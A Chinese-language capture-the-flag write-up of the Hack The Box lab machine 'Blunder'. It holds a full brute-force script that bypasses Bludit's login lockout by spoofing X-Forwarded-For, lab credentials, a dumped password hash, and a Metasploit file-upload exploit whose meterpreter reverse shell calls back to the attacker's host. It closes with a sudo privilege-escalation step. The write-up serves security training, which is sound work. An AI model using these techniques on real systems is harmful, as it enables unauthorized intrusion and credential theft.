HTB-靶机-Blunder
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.191
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.191 -o ./Blunder-autorecon masscan -p1-65535 10.10.10.191 --rate=1000 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//') nmap -Pn -sV -sC -p$ports 10.10.10.191
扫描结果就开放了个80端口,访问一把
没看到啥有价值的东西,看看网页源码
确认使用bludit版本为3.9.2的cms程序,网上搜索一把发现有暴力破解绕过漏洞,详情:https://rastating.github.io/bludit-brute-force-mitigation-bypass/
开始收集整理目标靶机的所有关键字作为密码字典,这里使用cewl进行收集,https://github.com/digininja/CeWL
cewl 10.10.10.191 > wordlist.txt
收集的同时爆破下目录靶机网站的目录,通用使用rustbuster二进制爆破工具
爆破目录新工具 https://github.com/phra/rustbuster 下载二进制文件 wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster 探测目录 ./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15
如下结果:
kali@kali:~/Downloads/htb/blunder$ ./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15 ~ rustbuster v3.0.3 ~ by phra & ps1dr3x ~ _ _ _ _ _ _ _ _ _ _ /\ \ /\_\ / /\ /\ \ / /\ /\_\ / /\ /\ \ /\ \ /\ \ / \ \/ / / _ / / \ \_\ \ / / \ / / / _ / / \ \_\ \ / \ \ / \ \ / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / /\ \ \ / /\ \ \ / / /\ \_\ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \ \ \ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \_\ / / /\ \_\ / / /_/ / /\__ / / / /\ \ \ \/___/ / /\ \ \/ / /\ \_\ \ \__ / / / /\ \ \ \/___/ / /\ \ \/ /_/_ \/_/ / / /_/ / / / / /__\/ / / / / / / / \ \ \ / / / \/_/ / /\ \ \___\ / / / / / / \ \ \ / / / \/_/ /____/\ / / /__\/ / / / /_____/ / / / / / _ \ \ \ / / / / / / \ \ \__// / / / / _ \ \ \ / / / / /\____\/ / / /_____/ / / /\ \ \ / / /___/ / /_/\__/ / / / / / / / /____\_\ \ / / /___/ / /_/\__/ / / / / / / / /______ / / /\ \ \ / / / \ \ \/ / /____\/ /\ \/___/ / /_/ / / / /__________/ / /____\/ /\ \/___/ / /_/ / / / /_______/ / / \ \ \ \/_/ \_\/\/_________/ \_____\/ \_\/ \/_____________\/_________/ \_____\/ \_\/ \/__________\/_/ \_\/ [?] Started at : 2021-05-08 10:55:03 GET 403 Forbidden http://10.10.10.191/.hta GET 403 Forbidden http://10.10.10.191/.hta.php GET 403 Forbidden http://10.10.10.191/.hta.txt GET 403 Forbidden http://10.10.10.191/.hta.pdf GET 403 Forbidden http://10.10.10.191/.htaccess GET 403 Forbidden http://10.10.10.191/.htpasswd GET 403 Forbidden http://10.10.10.191/.htpasswd.php GET 403 Forbidden http://10.10.10.191/.htaccess.php GET 403 Forbidden http://10.10.10.191/.htpasswd.pdf GET 403 Forbidden http://10.10.10.191/.htaccess.txt GET 403 Forbidden http://10.10.10.191/.htaccess.pdf GET 403 Forbidden http://10.10.10.191/.htpasswd.txt GET 200 OK http://10.10.10.191/0 GET 200 OK http://10.10.10.191/LICENSE GET 200 OK http://10.10.10.191/about GET 301 Moved Permanently http://10.10.10.191/admin => http://10.10.10.191/admin/ GET 301 Moved Permanently http://10.10.10.191/cgi-bin/ => http://10.10.10.191/cgi-bin GET 200 OK http://10.10.10.191/install.php GET 200 OK http://10.10.10.191/robots.txt GET 200 OK http://10.10.10.191/robots.txt GET 403 Forbidden http://10.10.10.191/server-status GET 200 OK http://10.10.10.191/todo.txt [00:09:19] ######################################## 18620/18620 ETA: 00:00:00 req/s: 33 [?] Ended at: 2021-05-08 11:04:22
都访问了一把,得到一个todo.txt信息
提示有用户fergus准备放入新blog,刚好上面也发现了登录窗口
直接根据上面找到的exploit进行暴力破解绕过测试获取账号的密码,最终通过python2版本实现的密码暴力破解程序代码如下:
#!/usr/bin/env python3 import re import requests host = 'http://10.10.10.191' login_url = host + '/admin/login' username = 'fergus' wordlist = [] words = open('wordlist.txt','r') for line in words: line=line.rstrip() wordlist.append(line) for password in wordlist: session = requests.Session() login_page = session.get(login_url) csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) print('[*] Trying: {p}'.format(p = password)) headers = { 'X-Forwarded-For': password, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.3865.90 Safari/537.36', 'Referer': login_url } data = { 'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': '' } login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location']: print() print('SUCCESS: Password found!') print('Use {u}:{p} to login.'.format(u = username, p = password)) print() break
得到账号和密码
fergus:RolandDeschain
登录进去这里花了点时间验证,最后确认存在文件上次和目录遍历配合起来的远程代码执行漏洞,详情:https://github.com/bludit/bludit/issues/1081
我这方便就使用metasploit进行直接利用
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.2 lhost => 10.10.14.2 msf5 exploit(linux/http/bludit_upload_images_exec) > set lport 8833 lport => 8833 msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus bludituser => fergus msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain bluditpass => RolandDeschain msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(linux/http/bludit_upload_images_exec) > exploit [-] Exploit failed: One or more options failed to validate: RHOSTS. [*] Exploit completed, but no session was created. msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191 rhosts => 10.10.10.191 msf5 exploit(linux/http/bludit_upload_images_exec) > exploit [*] Started reverse TCP handler on 10.10.14.2:8833 [+] Logged in as: fergus [*] Retrieving UUID... [*] Uploading aanOwmocKW.png... [*] Uploading .htaccess... [*] Executing aanOwmocKW.png... [*] Sending stage (38288 bytes) to 10.10.10.191 [*] Meterpreter session 1 opened (10.10.14.2:8833 -> 10.10.10.191:50620) at 2021-05-08 14:16:30 +0800 [+] Deleted .htaccess meterpreter >
通过翻看网站的根目录,发现除了3.9.2版本之外还有个3.10.0a版本
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php cat users.php <?php defined('BLUDIT') or die('Bludit CMS.'); ?> { "admin": { "nickname": "Hugo", "firstName": "Hugo", "lastName": "", "role": "User", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": ""} } www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
使用somd5进行破解密码
通过su直接切换至用户hugo
执行一把sudo -l
发现
(ALL, !root) /bin/bash
将其丢到Google里面搜索一把
https://www.exploit-db.com/exploits/47502
得到上面的提权漏洞,查看当前靶机的sudo版本
刚好符合上述漏洞的利用版本范围,直接利用提权
迷茫的人生,需要不断努力,才能看清远方模糊的志向!
